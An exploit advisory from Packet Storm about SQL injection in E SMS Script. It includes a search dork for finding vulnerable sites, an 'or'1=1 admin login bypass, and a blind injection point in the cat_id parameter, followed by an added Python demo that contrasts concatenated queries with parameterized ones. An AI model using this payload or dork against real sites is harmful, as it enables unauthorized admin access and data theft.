E SMS Script SQL Injection

2013-01-07T00:00:00
ID PACKETSTORM:119297
Type packetstorm
Reporter cr4wl3r
Modified 2013-01-07T00:00:00

Description

                                        
                                            `# E SMS Script Multiple SQL Injection Vulnerability  
# By cr4wl3r http://bastardlabs.info  
# http://bastardlabs.info/exploits/E_SMS_Script.txt  
# Good Music: http://goo.gl/TLkEs :)  
# Script: http://www.esmsscript.com/index.php?option=com_content&view=article&id=22&Itemid=41  
# Dork: inurl:"smscollection.php?cat_id="  
  
Proof of concept:  
  
Auth Bypass  
  
http://bastardlabs/admin/adminlogin.php  
Username: cr4wl3r  
Password: 'or'1=1  
  
Blind SQLi  
  
http://bastardlabs/smscollection.php?cat_id=[Blind SQLi]  
`
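
Added example, not part of the original advisory and not the vendor's code: the query pattern implied by the `'or'1=1` password and the `cat_id` parameter above, shown next to parameterized and validated versions. Table names, columns and function names are assumptions, and SQLite stands in for the application's database.

```python
import re
import sqlite3

def make_db():
    # Constructed schema and rows; the application's real tables are not on the page.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', 'correct-horse');
        CREATE TABLE sms (id INTEGER, cat_id INTEGER, body TEXT);
        INSERT INTO sms VALUES (1, 1, 'hello'), (2, 2, 'bye');
    """)
    return db

def login_concat(db, user, pw):
    # Vulnerable pattern: input is pasted into the SQL text, so a quote in
    # the password ends the string literal and the rest is parsed as SQL.
    q = f"SELECT username FROM admin WHERE username='{user}' AND password='{pw}'"
    return db.execute(q).fetchone() is not None

def login_param(db, user, pw):
    # Hardened: placeholders send the values separately from the statement.
    # (Plaintext comparison is kept only to mirror the query shape; store
    # password hashes in real code.)
    q = "SELECT username FROM admin WHERE username=? AND password=?"
    return db.execute(q, (user, pw)).fetchone() is not None

def sms_by_category(db, cat_id_raw):
    # cat_id is numeric: reject anything else, then bind it as a parameter.
    if not re.fullmatch(r"[0-9]{1,9}", cat_id_raw):
        raise ValueError("cat_id must be a decimal integer")
    q = "SELECT id, body FROM sms WHERE cat_id=? ORDER BY id"
    return db.execute(q, (int(cat_id_raw),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "cr4wl3r", "'or'1=1"))
    print(login_param(db, "cr4wl3r", "'or'1=1"))
    print(sms_by_category(db, "1"))
```

Because `AND` binds tighter than `OR`, the concatenated statement becomes `(username=... AND password='') OR '1=1'`, which is why no valid username is needed.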